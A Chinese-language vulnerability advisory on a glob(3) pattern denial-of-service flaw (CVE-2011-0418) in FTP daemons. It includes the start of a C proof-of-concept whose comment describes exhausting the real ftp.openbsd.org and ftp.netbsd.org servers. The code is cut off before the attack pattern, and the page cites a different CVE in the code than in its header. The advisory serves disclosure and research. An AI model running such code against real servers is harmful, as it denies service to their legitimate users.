GNU libc glob(3) “pattern”远程拒绝服务漏洞

发布日期:2011-05-02
更新日期:2011-05-02

受影响系统:
NetBSD NetBSD 5.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 47671
CVE ID: CVE-2011-0418

glibc是绝大多数Linux操作系统中C库的实现。

GNU libc在实现上存在glob(3) "pattern"远程拒绝服务漏洞,远程攻击者可利用此漏洞使受影响计算机失去响应,拒绝服务合法用户。

<*来源:Maksymilian Arciemowicz (max@jestsuper.pl
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/*
PoC for multiple vendors ftpd (libc/glob) resource exhaustion [CVE-2010-2632]

Affected Software (verified):
- OpenBSD 4.7
- NetBSD 5.0.2
- FreeBSD 7.3/8.1
- Oracle Sun Solaris 10

Affected Vendors (not verified):
- GNU Libc (glibc)
- Apple
- Microsoft
- HP
- more

Credit:
Maksymilian Arciemowicz
cxib I securityreason J com

Note:
With similar script in php writed (this same pattern), we have attacked OpenBSD/NetBSD servers with result:

- ftp.openbsd.org:
Connection refused

and in the end of attack

# telnet ftp.openbsd.org 21
Trying 129.128.5.191...
Connected to ftp.openbsd.org.
Escape character is '^]'.
421-  If you are seeing this message you have been blocked from using
421- this ftp server - most likely for mirroring content without paying
421- attention to what you were mirroring or where you should be mirroring
421- it from, or for excessive connection rates.
421- OpenBSD should *NOT* be mirrored from here, you should use
421- a second level mirror as described in
421

Connection closed by foreign host.
#

-ftp.netbsd.org:
no more access for anonymous =>
---
On 02.07.2010 20:29 CET, ftp.netbsd.org has return:
530 User ftp access denied, connection limit of 160 reached.
---

and in the end, deny for my host.

*/

int sendftp(int stream,char *what){
        if(-1==send(stream,what,strlen(what),0))
                printf("Can't send %s\n",what);
        else
                printf("send: %s\n",what);

bzero(what,sizeof(what));
}

void readftp(int stream,int len){
        char readline[len];
        if(recv(stream,readline,len,0)<1)
                printf("Can't read from stream\n");
        else
                printf("recv: %s\n",readline);
}


int sendstat(host,port,login,pass,pattern)
        char *host,*port,*login,*pass,*pattern;
{
        char buffer[1024]; // send ftp command buffor
        int     sockfd,n,error;
        struct addrinfo hints;
    struct addrinfo *res, *res0;

memset(&hints, 0, sizeof(hints));
        hints.ai_family = PF_UNSPEC;
        hints.ai_socktype = SOCK_STREAM;
        error = getaddrinfo(host,port,&hints,&res0);

if (error){
                errorcon:
                printf("Can`t connect\n.exit");
                exit(1);
        }

if((sockfd=socket(res0->ai_family,res0->ai_socktype, res0->ai_protocol))<0)     goto errorcon;
        if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon;

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwxpgp.html